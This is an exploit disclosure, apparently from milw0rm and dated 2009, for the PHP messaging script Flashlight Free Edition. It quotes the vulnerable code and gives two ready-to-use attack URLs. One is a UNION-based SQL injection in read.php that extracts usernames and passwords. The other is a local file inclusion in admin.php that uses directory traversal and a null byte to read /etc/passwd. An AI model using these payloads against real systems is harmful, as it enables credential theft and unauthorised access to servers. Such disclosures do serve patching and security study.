flashlight free edition - Local File Inclusion / SQL Injection


Author:

K4m1k451

Type:

webapps

Platform:

PHP

Published:

2009-06-02

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

RATM: "All hell can't stop us now!"

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Author : k4m1k451

--[E-mail : k4m1k451@gmail.com
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Script   : Flashlight

--[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Remote SQLi

--[File     : read.php


--[Vul      :
$id = $_GET['id'];
$sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'");

--[Exploit  :
http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Local File Inclusion

--[File     : admin.php
--[Vul      :

$inc = $_GET['action'];
include ("admin/".$inc.".php");

--[Exploit  :
http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

# milw0rm.com [2009-06-02]